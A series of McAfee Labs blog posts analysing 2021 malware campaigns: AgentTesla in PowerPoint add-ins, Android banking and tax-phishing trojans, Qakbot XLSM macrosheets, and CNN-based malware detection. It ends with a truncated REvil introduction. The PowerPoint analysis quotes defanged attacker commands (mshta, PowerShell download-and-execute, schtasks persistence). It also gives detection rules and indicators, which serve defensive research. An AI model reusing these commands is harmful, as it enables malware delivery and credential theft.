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Malicious PowerPoint Documents on the Rise

22 September 2021 at 01:47

Authored by Anuradha M

McAfee Labs have observed a new phishing campaign that utilizes macro capabilities available in Microsoft PowerPoint. In this campaign, the spam email comes with a PowerPoint file as an attachment. Upon opening the malicious attachment, the VBA macro executes to deliver variants of AgentTesla which is a well-known password stealer. These spam emails purport to be related to financial transactions.  

AgentTesla is a RAT (Remote Access Trojan) malware that has been active since 2014. Attackers use this RAT as MASS(Malware-As-A-Service) to steal user credentials and other information from victims through screenshots, keylogging, and clipboard captures. Its modus operandi is predominantly via phishing campaigns. 

During Q2, 2021, we have seen an increase in PowerPoint malware. 

Figure 1. Trend of PPT malware over the first half of 2021
Figure 1. The trend of PPT malware over the first half of 2021

In this campaign, the spam email contains an attached file with a .ppam extension which is a PowerPoint file containing VBA code. The sentiment used was finance-related themes such asNew PO300093 Order as shown in Figure 2. The attachment filename is 300093.pdf.ppam”. 

Figure 2. Spam Email

PPAM file: 

This file type was introduced in 2007 with the release of Microsoft Office 2007. It is a PowerPoint macro-enabled Open XML add-in file. It contains components that add additional functionality, including extra commands, custom macros, and new tools for extending default PowerPoint functions.  

Since PowerPoint supports ‘add-ins’ developed by third parties to add new features, attackers abuse this feature to automatically execute macros. 

Technical Analysis: 

Once the victim opens the “.ppam” file, a security notice warning pop-up as shown in Figure 3 to alert the user about the presence of macro.

Figure 3. Warning when opening the attached PowerPoint file
Figure 3. Warning when opening the attached PowerPoint file

From Figure 4, you can see that the Add-in feature of the PowerPoint can be identified from the content of [Content_Types].xml file which will be present inside the ppam file. 

Figure 4. Powerpoint add-in feature with macroEnabled
Figure 4. Powerpoint add-in feature with macroEnabled

 The PPAM file contains the following files and directories which can be seen upon extraction. 

  • _rels\.rels 
  • [Content_Types].xml 
  • ppt\rels\presentation.xml.rels 
  • ppt\asjdaaasdasdsdaasdsdasasdasddoasddasasddasasdsasdjasddasdoasjdasasddoajsdjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa.bin – Malicious file 
  • ppt\presentation.xml 

Once the victim enables the macro, the add-in gets installed silently without user knowledge, which can be seen in Figure 5. On seeing that there is no content and no slide in the PowerPoint, the user will close the file but, in the backend, macro code gets executed to initiate the malicious activity. 

Figure 5. Installed Add-ins in the PowerPoint options
Figure 5. Installed Add-ins in the PowerPoint options

As you can see in Figure 6, the macro is executed within the add-in auto_open() event i.e.., macro is fired immediately after the presentation is opened and the add-in is loaded. 

Figure 6.VBA Code snippet with auto_open() event
Figure 6.VBA Code snippet with auto_open() event

The PowerPoint macro code on execution launches an URL by invoking mshta.exe (Microsoft HTML Application) which is shown in Figure 7. The mshta process is launched by Powerpoint by calling the CreateProcessA() API. 

Below are the parameters passed to CreateProcessA() API: 

kernel32.CreateProcessA(00000000,mshta hxxps://,00000000,00000000,00000001,00000020,00000000,00000000,D, 

Figure 7. VBA Code snippet containing mshta and url
Figure 7. VBA Code snippet containing mshta and url

Below is the command line parameter of mshta: 

mshta hxxps:// 

The URL hxxps:// is redirected to “hxxps://p8hj[.]blogspot[.]com/p/27.html” but it didn’t get any response from “27.html” at the time of analysis. 

Later mshta.exe spawns powershell.exe as a child process. 

Below is the command line parameters of PowerShell: 

powershell.exe - ”C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe” i’E’x(iwr(‘hxxps://‘) -useB);i’E’x(iwr(‘hxxps://‘) -useB);i’E’x(iwr(‘hxxps://‘) -useB); 

PowerShell downloads and executed script files from the above-mentioned URLs.  

The below Figure 8 shows the content of the first url – “hxxps://”: 

Figure 8. Binary file content
Figure 8. Binary file content

There are two binary files stored in two huge arrays inside each downloaded PowerShell file. The first file is an EXE file that acts as a loader and the second file is a DLL file, which is a variant of AgentTesla. PowerShell fetches the AgentTesla payload from the URLs mentioned in the command line, decodes it, and launches MSBuild.exe to inject the payload within itself. 

Schedule Tasks: 

To achieve persistence, it creates a scheduled task in “Task Scheduler” and drops a task file under C:\windows\system32\SECOTAKSA to make the entire campaign work effectively.   

Figure 9. Code snippet to create a new schedule task
Figure 9. Code snippet to create a new scheduled task

The new task name is SECOTAKSA”. Its action is to execute the command mshta hxxp:// //1230948%[email protected]/p/27.html” and it’s called every 80 minutes.  

Below is the command line parameters of schtasks: 

schtasks.exe - “C:\Windows\System32\schtasks.exe” /create /sc MINUTE /mo 80 /tn “”SECOTAKSA”” /F /tr “”\””MsHtA””\””hxxp://1230948%[email protected]/p/27.html\“” 

Infection Chain: 

Figure 10. Infection Chain
Figure 10. Infection Chain

Process Tree: 

Figure 11. Process Tree
Figure 11. Process Tree


McAfee’s Endpoint Security (ENS) and Windows Systems Security (WSS) product have  DAT coverage for this variant of malware. 

This malicious PPAM document with SHA256: fb594d96d2eaeb8817086ae8dcc7cc5bd1367f2362fc2194aea8e0802024b182 is detected as “W97M/Downloader.dkw”.  

The PPAM document is also blocked by the AMSI feature in ENS as AMSI-FKN! 

Additionally, the Exploit Prevention feature in McAfee’s Endpoint Security product blocks the infection chain of this malware by adding the below expert rule so as to protect our customers from this malicious attack. 

Expert Rule authored based on the below infection chain: 

POWERPNT.EXE –> mshta.exe  

Expert Rule: 

Rule { 

  Process { 

    Include OBJECT_NAME { -v “powerpnt.exe” } 


  Target { 

    Match PROCESS { 

       Include OBJECT_NAME { -v “mshta.exe” } 

       Include PROCESS_CMD_LINE { -v “**http**” } 

       Include -access “CREATE” 







hxxp:// //1230948%[email protected]/p/27.html 





EML files: 





PPAM files: 






Extracted AgentTesla files: 



The post Malicious PowerPoint Documents on the Rise appeared first on McAfee Blog.

Android malware distributed in Mexico uses Covid-19 to steal financial credentials

13 September 2021 at 12:27

Authored by Fernando Ruiz

McAfee Mobile Malware Research Team has identified malware targeting Mexico. It poses as a security banking tool or as a bank application designed to report an out-of-service ATM. In both instances, the malware relies on the sense of urgency created by tools designed to prevent fraud to encourage targets to use them. This malware can steal authentication factors crucial to accessing accounts from their victims on the targeted financial institutions in Mexico. 

McAfee Mobile Security is identifying this threat as Android/Banker.BT along with its variants. 

How does this malware spread? 

The malware is distributed by a malicious phishing page that provides actual banking security tips (copied from the original bank site) and recommends downloading the malicious apps as a security tool or as an app to report out-of-service ATM. It’s very likely that a smishing campaign is associated with this threat as part of the distribution method or it’s also possible that victims may be contacted directly by scam phone calls made by the criminals, a common occurrence in Latin America. Fortunately, this threat has not been identified on Google Play yet. 

Here’s how to protect yourself 

During the pandemic, banks adopted new ways to interact with their clients. These rapid changes meant customers were more willing to accept new procedures and to install new apps as part of the ‘new normal’ to interact remotely. Seeing this, cyber-criminals introduced new scams and phishing attacks that looked more credible than those in the past leaving customers more susceptible. 

Fortunately, McAfee Mobile Security is able to detect this new threat as Android/Banker.BT. To protect yourself from this and similar threats: 

  • Employ security software on your mobile devices  
  • Think twice before downloading and installing suspicious apps especially if they request SMS or Notification listener permissions. 
  • Use official app stores however never trust them blindly as malware may be distributed on these stores too so check for permissions, read reviews and seek out developer information if available. 
  • Use token based second authentication factor apps (hardware or software) over SMS message authentication 

Interested in the details? Here’s a deep dive on this malware 

Behavior: Carefully guiding the victim to provide their credentials 

Once the malicious app is installed and started, the first activity shows a message in Spanish that explains the fake purpose of the app: 

– Fake Tool to report fraudulent movements that creates a sense of urgency: 

“The ‘bank name has created a tool to allow you to block any suspicious movement. All operations listed on the app are still pending. If you fail to block the unrecognized movements in less than 24 hours, then they will charge your account automatically. 

At the end of the blocking process, you will receive an SMS message with the details of the blocked operations.” 

– In the case of the Fake ATM failure tool to request a new credit card under the pandemic context, there is a similar text that lures users into a false sense of security: 

“As a Covid-19 sanitary measure, this new option has been created. You will receive an ID via SMS for your report and then you can request your new card at any branch or receive it at your registered home address for free. Alert! We will never request your sensitive data such as NIP or CVV.”This gives credibility to the app since it’s saying it will not ask for some sensitive data; however, it will ask for web banking credentials. 

If the victims tap on “Ingresar” (“access”) then the banking trojan asks for SMS permissions and launch activity to enter the user id or account number and then the password. In the background, the password or ‘clave’ is transmitted to the criminal’s server without verifying if the provided credentials are valid or being redirected to the original bank site as many others banking trojan does. 

Finally, a fixed fake list of transactions is displayed so the user can take the action of blocking them as part of the scam however at this point the crooks already have the victim’s login data and access to their device SMS messages so they are capable to steal the second authentication factor. 

In case of the fake tool app to request a new card, the app shows a message that says at the end “We have created this Covid-19 sanitary measure and we invite you to visit our anti-fraud tips where you will learn how to protect your account”.  

In the background the malware contacts the command-and-control server that is hosted in the same domain used for distribution and it sends the user credentials and all users SMS messages over HTTPS as query parameters (as part of the URL) which can lead to the sensitive data to be stored in web server logs and not only the final attacker destination. Usually, malware of this type has poor handling of the stolen data, therefore, it’s not surprising if this information is leaked or compromised by other criminal groups which makes this type of threat even riskier for the victims. Actually, in figure 8 there is a partial screenshot of an exposed page that contains the structure to display the stolen data. 

Table Headers: Date, From, Body Message, User, Password, Id: 

This mobile banker is interesting due it’s a scam developed from scratch that is not linked to well-known and more powerful banking trojan frameworks that are commercialized in the black market between cyber-criminals. This is clearly a local development that may evolve in the future in a more serious threat since the decompiled code shows accessibility services class is present but not implemented which leads to thinking that the malware authors are trying to emulate the malicious behavior of more mature malware families. From the self-evasion perspective, the malware does not offer any technique to avoid analysis, detection, or decompiling that is signal it’s in an early stage of development. 



  • 84df7daec93348f66608d6fe2ce262b7130520846da302240665b3b63b9464f9 
  • b946bc9647ccc3e5cfd88ab41887e58dc40850a6907df6bb81d18ef0cb340997 
  • 3f773e93991c0a4dd3b8af17f653a62f167ebad218ad962b9a4780cb99b1b7e2 
  • 1deedb90ff3756996f14ddf93800cd8c41a927c36ac15fcd186f8952ffd07ee0 


  • https[://] 

The post Android malware distributed in Mexico uses Covid-19 to steal financial credentials appeared first on McAfee Blog.

Phishing Android Malware Targets Taxpayers in India

3 September 2021 at 18:33

Authored by ChanUng Pak  

McAfee’s Mobile Research team recently found a new Android malware, Elibomi, targeting taxpayers in India. The malware steals sensitive financial and private information via phishing by pretending to be a tax-filing application. We have identified two main campaigns that used different fake app themes to lure in taxpayers. The first campaign from November 2020 pretended to be a fake IT certificate application while the second campaign, first seen in May 2021, used the fake tax-filing theme. With this discovery, the McAfee Mobile Research team has been able to update McAfee Mobile Security so that it detects this threat as Android/Elibomi and alerts mobile users if this malware is present in their devices. 

During our investigation, we found that in the latest campaign the malware is delivered using an SMS text phishing attack. The SMS message pretends to be from the Income Tax Department in India and uses the name of the targeted user to make the SMS phishing attack more credible and increase the chances of infecting the device. The fake app used in this campaign is designed to capture and steal the victim’s sensitive personal and financial information by tricking the user into believing that it is a legitimate tax-filing app. 

We also found that Elibomi exposes the stolen sensitive information to anyone on the Internet. The stolen data includes e-mail addresses, phone numbers, SMS/MMS messages among other financial and personal identifiable information. McAfee has reported the servers exposing the data and at the time of publication of this blog the exposed information is no longer available. 

Pretending to be an app from the Income Tax Department in India 

The latest and most recent Elibomi campaign uses a fake tax-filing app theme and pretends to be from the Income Tax Department from the Indian government. They even use the original logo to trick the users into installing the app. The package names (unique app identifiers) of these fake apps consist of a random word + another random string + imobile (e.g. “direct.uujgiq.imobile” and “olayan.aznohomqlq.imobile”). As mentioned before this campaign has been active since at least May 2021. 

Figure 1. Fake iMobile app pretending to be from the Income Tax Department and asking SMS permissions 

After all the required permissions are granted, Elibomi attempts to collect personal information like e-mail address, phone number and SMS/MMS messages stored in the infected device: 

Figure 2. Elibomi stealing SMS messages 

Prevention and defense 

Here are our recommendations to avoid being affected by this and other Android threats that use social engineering to convince users to install malware disguised as legitimate apps: 

  • Have a reliable and updated security application like McAfee Mobile Security installed in your mobile devices to protect you against this and other malicious applications. 
  • Do not click on suspicious links received from text messages or social media, particularly from unknown sources. Always double check by other means if a contact that sends a link without context was really sent by that person because it could lead to the download of a malicious application. 


Android/Elibomi is just another example of the effectiveness of personalized phishing attacks to trick users into installing a malicious application even when Android itself prevents that from happening. By pretending to be an “Income Tax” app from the Indian government, Android/Elibomi has been able to gather very sensitive and private personal and financial information from affected users which could be used to perform identify and/or financial fraud. Even more worryingly, the information was not only in cybercriminals’ hands, but it was also unexpectedly exposed on the Internet which could have a greater impact on the victims. As long as social engineering attacks remain effective, we expect that cybercriminals will continue to evolve their campaigns to trick even more users with different fake apps including ones related to financial and tax services. 

McAfee Mobile Security detects this threat as Android/Elibomi and alerts mobile users if it is present. For more information about McAfee Mobile Security, visit 

For those interested in a deeper dive into our research… 

Distribution method and stolen data exposed on the Internet 

During our investigation, we found the main distribution method of the latest campaign in one of the stolen SMS messages exposed in one of the C2 servers. The SMS body field in the screenshot below shows the Smishing attack used to deliver the malware. Interestingly, the message includes the victim’s name in order to make the message more personal and therefore more credible. It also urges the user to click on a suspicious link with the excuse of checking an urgent update regarding the victim’s Income Tax return: 

Figure 3. Exposed information includes the SMS phishing attack used to originally deliver the malware 

Elibomi not only exposes stolen SMS messages, but it also captures and exposes the list of all accounts logged in the infected devices: 

Figure 4. Example of account information exposed in one of the C2 servers

If the targeted user clicks on the link in the text message, a phishing page will be shown pretending to be from the Income Tax Department from the Indian government which addresses the user by its name to make the phishing attack more credible: 

Figure 5. Fake e-Filing phishing page pretending to be from the Income Tax Department in India 

Each targeted user has a different application. For example in the screenshot below we have the app “cisco.uemoveqlg.imobile” on the left and “komatsu.mjeqls.imobile” on the right: 

Figure 6. Different malicious applications for different users

During our investigation, we found that there are several variants of Elibomi for the same iMobile fake Income tax app. For example, some iMobile apps only have the login page while in others have the option to “register” and request a fake tax refund: 

Figure 7. Fake iMobile screens designed to capture personal and financial information 

The sensitive financial information provided by the tricked user is also exposed on the Internet: 

Figure 8. Example of exposed financial information stolen by Elibomi using a fake tax filling app 

Related Fake IT Certificate applications 

The first Elibomi campaign pretended to be a fake “IT Certificate” app was found to be distributed in November 2020.  In the following figure we can see the similarities in the code between the two malware campaigns: 

Figure 9. Code similarity between Elibomi campaigns 

The malicious application impersonated an IT certificate management module that is purposedly used to validate the device in a non-existent verification server. Just like the most recent version of Elibomi, this fake ITCertificate app requests SMS permissions but it also requests device administrator privileges, probably to make more difficult its removal. The malicious application also simulates a “Security Scan” but in reality what it is doing in the background is stealing personal information like e-mail, phone number and SMS/MMS messages stored in the infected device: 

Figure 10. Fake ITCertificate app pretending to do a security scan while it steals personal data in the background 

Just like with the most recent “iMobile” campaign, this fake “ITCertificate” also exposes the stolen data in one of the C2 servers. Here’s an example of a stolen SMS message that uses the same log fields and structure as the “iMobile” campaign: 

Figure 11. SMS message is stolen by the fake “ITCertificate” using the same log structure as “iMobile” 

Interesting string obfuscation technique 

The cybercriminals behind these two pieces of malware designed a simple but interesting string obfuscation technique. All strings are decoded by calling different classes and each class has a completely different table value

Figure 12. Calling the de-obfuscation method with different parameters 

Figure 13. String de-obfuscation method 

Figure 14. String de-obfuscation table 

The algorithm is a simple substitution cipher. For example, 35 is replaced with ‘h’ and 80 is replaced with ‘t’ to obfuscate the string. 

Appendix – Technical Data and IOCs 

Hash  Package name 
1e8fba3c530c3cd7d72e208e25fbf704ad7699c0a6728ab1b290c645995ddd56  direct.uujgiq.imobile 
7f7b0555563e08e0763fe52f1790c86033dab8004aa540903782957d0116b87f  ferrero.uabxzraglk.imobile 


120a51611a02d1d8bd404bb426e07959ef79e808f1a55ce5bff33f04de1784ac  erni.zbvbqlk.imobile 


ecbd905c44b1519590df5465ea8acee9d3c155334b497fd86f6599b1c16345ef  olayan.bxynrqlq.imobile 


da900a00150fcd608a09dab8a8ccdcf33e9efc089269f9e0e6b3daadb9126231  foundation.aznohomqlq.imobile 
795425dfc701463f1b55da0fa4e7c9bb714f99fecf7b7cdb6f91303e50d1efc0  fresenius.bowqpd.immobile 
b41c9f27c49386e61d87e7fc429b930f5e01038d17ff3840d7a3598292c935d7  cisco.uemoveqlg.immobile 
8de8c8c95fecd0b1d7b1f352cbaf839cba1c3b847997c804dfa2d5e3c0c87dfe  komatsu.mjeqls.imobile 
ecbd905c44b1519590df5465ea8acee9d3c155334b497fd86f6599b1c16345ef  olayan.bxynrqlq.imobile 
326d81ba7a715a57ba7aa2398824b420fff84cda85c0dd143462300af4e0a37a  alstom.zjeubopqf.certificate 
154cfd0dbb7eb2a4f4e5193849d314fa70dcc3caebfb9ab11b4ee26e98cb08f7  alstom.zjeubopqf.certificate 
c59ecd344729dac99d9402609e248c80e10d39c4d4d712edef0df9ee460fbd7b  alstom.zjeubopqf.certificate 
16284cad1b5a36e2d2ea9f67f5c772af01b64d785f181fd31d2e2bec2d98ce98  alstom.zjeubopqf.certificate 
98fc0d5f914ae47b61bc7b54986295d86b502a9264d7f74739ca452fac65a179  alstom.zjeubopqf.certificate 




The post Phishing Android Malware Targets Taxpayers in India appeared first on McAfee Blog.

The Rise of Deep Learning for Detection and Classification of Malware

13 August 2021 at 00:50

Co-written by Catherine Huang, Ph.D. and Abhishek Karnik 

Artificial Intelligence (AI) continues to evolve and has made huge progress over the last decade. AI shapes our daily lives. Deep learning is a subset of techniques in AI that extract patterns from data using neural networks. Deep learning has been applied to image segmentation, protein structure, machine translation, speech recognition and robotics. It has outperformed human champions in the game of Go. In recent years, deep learning has been applied to malware analysis. Different types of deep learning algorithms, such as convolutional neural networks (CNN), recurrent neural networks and Feed-Forward networks, have been applied to a variety of use cases in malware analysis using bytes sequence, gray-scale image, structural entropy, API call sequence, HTTP traffic and network behavior.  

Most traditional machine learning malware classification and detection approaches rely on handcrafted features. These features are selected based on experts with domain knowledge. Feature engineering can be a very time-consuming process, and handcrafted features may not generalize well to novel malware. In this blog, we briefly describe how we apply CNN on raw bytes for malware detection and classification in real-world data. 

  1. CNN on Raw Bytes 

Figure 1: CNNs on raw bytes for malware detection and classification

The motivation for applying deep learning is to identify new patterns in raw bytes. The novelty of this work is threefold. First, there is no domain-specific feature extraction and pre-processing. Second, it is an end-to-end deep learning approach. It can also perform end-to-end classification. And it can be a feature extractor for feature augmentation. Third, the explainable AI (XAI) provides insights on the CNN decisions and help human identify interesting patterns across malware families. As shown in Figure 1, the input is only raw bytes and labels. CNN performs representation learning to automatically learn features and classify malware.  

2. Experimental Results 

For the purposes of our experiments with malware detection, we first gathered 833,000 distinct binary samples (Dirty and Clean) across multiple families, compilers and varying “first-seen” time periods. There were large groups of samples from common families although they did utilize varying packers, obfuscators. Sanity checks were performed to discard samples that were corrupt, too large or too small, based on our experiment. From samples that met our sanity check criteria, we extracted raw bytes from these samples and utilized them for conducting multiple experiments. The data was randomly divided into a training and a test set with an 80% / 20% split. We utilized this data set to run the three experiments.  

In our first experiment, raw bytes from the 833,000 samples were fed to the CNN and the performance accuracy in terms of area under receiver operating curve (ROC) was 0.9953.  

One observation with the initial run was that, after raw byte extraction from the 833,000 unique samples, we did find duplicate raw byte entries. This was primarily due to malware families that utilized hash-busting as an approach to polymorphism. Therefore, in our second experiment, we deduplicated the extracted raw byte entries. This reduced the raw byte input vector count to 262,000 samples. The test area under ROC was 0.9920. 

In our third experiment, we attempted multi-family malware classification. We took a subset of 130,000 samples from the original set and labeled 11 categories – the 0th were bucketed as Clean, 1-9 of which were malware families, and the 10th were bucketed as Others. Again, these 11 buckets contain samples with varying packers and compilers. We performed another 80 / 20% random split for the training set and test set. For this experiment, we achieved a test accuracy of 0.9700. The training and test time on one GPU was 26 minutes.  

3. Visual Explanation 

Figure 2: visual explanation using T-SNE and PCA before and after the CNN training
Figure 2: A visual explanation using T-SNE and PCA before and after the CNN training

To understand the CNN training process, we performed a visual analysis for the CNN training. Figure 2 shows the t-Distributed Stochastic Neighbor Embedding (t-SNE) and Principal Component Analysis (PCA) for before and after CNN training. We can see that after training, CNN is able to extract useful representations to capture characteristics of different types of malware as shown in different clusters. There was a good separation for most categories, lending us to believe that the algorithm was useful as a multi-class classifier. 

We then performed XAI to understand CNN’s decisions. Figure 3 shows XAI heatmaps for one sample of Fareit and one sample of Emotet. The brighter the color is the more important the bytes contributing to the gradient activation in neural networks. Thus, those bytes are important to CNN’s decisions. We were interested in understanding the bytes that weighed in heavily on the decision-making and reviewed some samples manually. 

Figure 3: XAI heatmaps on Fareit (left) and Emotet (right)
Figure 3: XAI heatmaps on Fareit (left) and Emotet (right)

4. Human analysis to understand the ML decision and XAI  

Figure 4: Human analysis on CNN’s predictions
Figure 4: Human analysis on CNN’s predictions

To verify if the CNN can learn new patterns, we fed a few never before seen samples to the CNN, and requested a human expert to verify the CNN’s decision on some random samples. The human analysis verified that the CNN was able to correctly identify many malware familiesIn some cases, it identified samples accurately before the top 15 AV vendors based on our internal tests. Figure 4 shows a subset of samples that belong to the Nabucur family that were correctly categorized by the CNN despite having no vendor detection at that point in timeIt’s also interesting to note that our results showed that the CNN was able to currently categorize malware samples across families utilizing common packers into an accurate family bucket. 

Figure 5: domain analysis on sample compiler
Figure 5: domain analysis on sample compiler

We ran domain analysis on the same sample complier VB files. As shown in Figure 5, CNN was able to identify two samples of a threat family before other vendors. CNN agreed with MSMP/other vendors on two samples. In this experiment, the CNN incorrectly identified one sample as Clean.  

Figure 6: Human analysis on an XAI heatmap. Above is the resulting disassembly of part of the decryption tea algorithm from the Hiew tool.
Figure 6: Human analysis on an XAI heatmap. Above is the resulting disassembly of part of the decryption tea algorithm from the Hiew tool.
Above is XAI heatmap for one sample.
Above is XAI heatmap for one sample.

We asked a human expert to inspect an XAI heatmap and verify if those bytes in bright color are associated with the malware family classification. Figure 6 shows one sample which belongs to the Sodinokibi family. The bytes identified by the XAI (c3 8b 4d 08 03 d1 66 c1) are interesting because the byte sequence belongs to part of the Tea decryption algorithm. This indicates these bytes are associated with the malware classification, which confirms the CNN can learn and help identify useful patterns which humans or other automation may have overlooked. Although these experiments were rudimentary, they were indicative of the effectiveness of the CNN in identifying unknown patterns of interest.  

In summary, the experimental results and visual explanations demonstrate that CNN can automatically learn PE raw byte representations. CNN raw byte model can perform end-to-end malware classification. CNN can be a feature extractor for feature augmentation. The CNN raw byte model has the potential to identify threat families before other vendors and identify novel threats. These initial results indicate that CNN’s can be a very useful tool to assist automation and human researcher in analysis and classification. Although we still need to conduct a broader range of experiments, it is encouraging to know that our findings can already be applied for early threat triage, identification, and categorization which can be very useful for threat prioritization.  

We believe that McAfee’s ongoing AI research, such as deep learning-based approaches, leads the security industry to tackle the evolving threat landscape, and we look forward to continuing to share our findings in this space with the security community. 

The post The Rise of Deep Learning for Detection and Classification of Malware appeared first on McAfee Blog.

XLSM Malware with MacroSheets

6 August 2021 at 20:29

Written by: Lakshya Mathur

Excel-based malware has been around for decades and has been in the limelight in recent years. During the second half of 2020, we saw adversaries using Excel 4.0 macros, an old technology, to deliver payloads to their victims. They were mainly using workbook streams via the XLSX file format. In these streams, adversaries were able to enter code straight into cells (that’s why they were called macro-formulas). Excel 4.0 also used API level functions like downloading a file, creation of files, invocation of other processes like PowerShell, cmd, etc.  

With the evolution of technology, AV vendors started to detect these malicious Excel documents effectively and so to have more obfuscation and evasion routines attackers began to shift to the XLSM file format. In the first half of 2021, we have seen a surge of XLSM malware delivering different family payloads (as shown in below infection chart). In XLSM adversaries make use of Macrosheets to enter their malicious code directly into the cell formulas. XLSM structure is the same as XLSX, but XLSM files support VBA macros which are more advanced technology of Excel 4.0 macros. Using these macrosheets, attackers were able to access powerful windows functionalities and since this technique is new and highly obfuscated it can evade many AV detections. 

Excel 4.0 and XLSM are both known to download other malware payloads like ZLoader, Trickbot, Qakbot, Ursnif, IcedID, etc. 

Field hits for XLSM macrosheet malware detection
Field hits for XLSM macrosheet malware detection

The above figure shows the Number of samples weekly detected by the detected name “Downloader-FCEI” which specifically targets XLSM macrosheet based malware. 

Detailed Technical Analysis 

XLSM Structure 

XLSM files are spreadsheet files that support macros. A macro is a set of instructions that performs a record of steps repeatedly. XLSM files are based upon Open XLM formats that were introduced in Microsoft Office 2007. These file types are like XLSX but in addition, they support macros. 

Talking about the XLSM structure when we unzip the file, we see four basic contents of the file, these are shown below. 

Figure-1: Content inside XLSM file
Figure-1: Content inside XLSM file
  • _rels contains the starting package-level relationship. 
  • docProps contains the metadata of the excel file. 
  • xl folder contains the actual contents of the file. 
  • [Content_Types].xml has references to the XML files present within the above folders. 

We will focus more on the “xl” folder contents. This folder contains all the excel file main contents like all the worksheets, media files, styles.xml file, sharedStrings.xml file, workbook.xml file, etc. All these files and folders have data related to different aspects of the excel file. But for XLSM files we will focus on one unique folder called macrosheets. 

These XLSM files contain macrosheets as shown in figure-2 which are nothing but XML sheet files that can support macros. These sheets are not available in other Excel file formats. In the past few months, we have seen a huge surge in XLSM file-type malware in which attackers store malicious strings hidden within these macrosheets. We will see more details about such malware in this blog. 

Figure-2: Macrosheets folder inside xl folder
Figure-2: Macrosheets folder inside xl folder

To explain further how attackers uses XLSM files we have taken a Qakbot sample with SHA 91a1ba70132139c99efd73ca21c4721927a213bcd529c87e908a9fdd71570f1e. 

Infection Chain

Figure-3: Infection chain for Qakbot Malware
Figure-3: Infection chain for Qakbot Malware

The infection chain for both Excel 4.0 Qakbot and XLSM Qakbot is similar. They both downloads dll and execute it using rundll32.exe with DllResgisterServer as the export function. 

XLSM Threat Analysis 

On opening the XLSM file there is an image that prompts the user to enable the content. To look legitimate and clean malicious actors use a very official-looking template as shown below.

Figure-4: Image of Xlsm file face
Figure-4 Image of Xlsm file face

On digging deeper, we see its internal workbook.xml file. 

Figure-5: workbook.xml content
Figure-5: workbook.xml content

Now as we can see in the workbook.xml file (Figure-5), there is a total of 6 sheets and their state is hidden. Also, two cells have a predefined name and one of them is Sheet2323!$A$1 defined as “_xlnm.Auto_Open” which is similar to Sub Auto_Open() as we generally see in macro files. It automatically runs the macros when the user clicks on Enable Content.  

As we saw in Figure-3 on opening the file, we only see the enable content image. Since the state of sheets was hidden, we can right-click on the main sheet tab and we will see unhide option there, then we can select each sheet to unhide it. On hiding the sheet and change the font color to red we saw some random strings as seen in figure 6. 

Figure-6: Sheet face of xlsm file
Figure-6: Sheet face of xlsm file

These hidden sheets contain malicious strings in an obfuscated manner. So, on analyzing more we observed that sheets inside the macrosheets folder contain these malicious strings. 

Figure-7: Content of macrosheet XML file
Figure-7: Content of macrosheet XML file

Now as we can in figure-7 different tags are used in this XML sheet file. All the malicious strings are present in two tags <f> and <v> tags inside <sheetdata> tags. Now let’s look more in detail about these tags. 

<v> (Cell Value) tags are used to store values inside the cell. <f> (Cell Formula) tags are used to store formulas inside the cell. Now in the above sheet <v> tags contain the cached formula value based on the last time formula was calculated. Formula cells contain formulas like “GOTO(Sheet2!H13)”, now as we can see here attackers can store different formulas while referencing cells from different sheets. These operations are done to produce more and more obfuscated sheets and evade AV signatures. 

When the user clicks on the enable content button the execution starts from the Auto_Open cell, after which each sheet formula will start to execute one by one. The final deobfuscated string is shown below. 

Figure-8: Final De-Obfuscated strings from the file
Figure-8: Final De-Obfuscated strings from the file

Here the URLDownloadToFIleA API is used to download the payload and the string “JJCCBB” is used to specify data types to call the API. There are multiple URI’s and from one of them, the DLL payload gets downloaded and saved as ..\\lertio.cersw. This DLL payload is then executed using rundll32. All these malicious activities get carried out using various excel based formulas like REGISTER, EXEC, etc. 

Coverage and prevention guidance: 

McAfee’s Endpoint products detect this variant of malware as below: 

The main malicious document with SHA256 (91a1ba70132139c99efd73ca21c4721927a213bcd529c87e908a9fdd71570f1e) is detected as “Downloader-FCEI” with current DAT files. 

Additionally, with the help of McAfee’s Expert rule feature, customers can add a custom behavior rule, specific to this infection pattern. 

Rule { 

    Process { 

        Include OBJECT_NAME { -v “EXCEL.exe” } 


Target { 

        Match PROCESS { 

            Include OBJECT_NAME { -v “rundll32.exe” } 

                      Include PROCESS_CMD_LINE { -v “* ..\\*.*,DllRegisterServer” }  

                            Include -access “CREATE” 




McAfee advises all users to avoid opening any email attachments or clicking any links present in the mail without verifying the identity of the sender. Always disable the Macro execution for Office files. We advise everyone to read our blog on these types of malicious XLSM files and their obfuscation techniques to understand more about the threat. 

Different techniques & tactics are used by the malware to propagate, and we mapped these with the MITRE ATT&CK platform. 

  • T1064(Scripting): Use of Excel 4.0 macros and different excel formulas to download the malicious payload. 
  • Defense Evasion (T1218.011): Execution of Signed binary to abuse Rundll32.exe and proxy executes the malicious code is observed in this Qakbot variant.  
  • Defense Evasion (T1562.001): Office file tries to convince a victim to disable security features by using a clean-looking image. 
  • Command and Control(T1071): Use of Application Layer Protocol HTTP to connect to the web and then downloads the malicious payload. 


XLSM malware has been seen delivering many malware families. Many major families like Trickbot, Gozi, IcedID, Qakbot are using these XLSM macrosheets in high quantity to deliver their payloads. These attacks are still evolving and keep on using various obfuscated strings to exploit various windows utilities like rundll32, regsvr32, PowerShell, etc. 

Due to security concerns, macros are disabled by default in Microsoft Office applications. We suggest it is only safe to enable them when the document received is from a trusted source and macros serve an expected purpose. 

The post XLSM Malware with MacroSheets appeared first on McAfee Blog.

REvil Ransomware Uses DLL Sideloading

16 July 2021 at 16:49

This blog was written byVaradharajan Krishnasamy, Karthickkumar, Sakshi Jaiswal


Ransomware attacks are one of the most common cyber-attacks among organizations; due to an increase in Ransomware-as-a-service (RaaS) on the black market. RaaS provides readily available ransomware to cyber criminals and is an effective way for attackers to deploy a variety of ransomware in a short period of time.

Usually, RaaS model developers sell or rent their sophisticated ransomware framework on the black market. After purchasing the license from the ransomware developer, attackers spread the ransomware to other users, infect them, encrypt files, and demand a huge ransom payment in Bitcoin.  Also, there are discounts available on the black market for ransomware frameworks in which the ransom money paid is shared between developers and the buyer for every successful extortion of ransom from the victims. These frameworks reduce the time and effort of creating a new ransomware from scratch using latest and advanced programming languages.

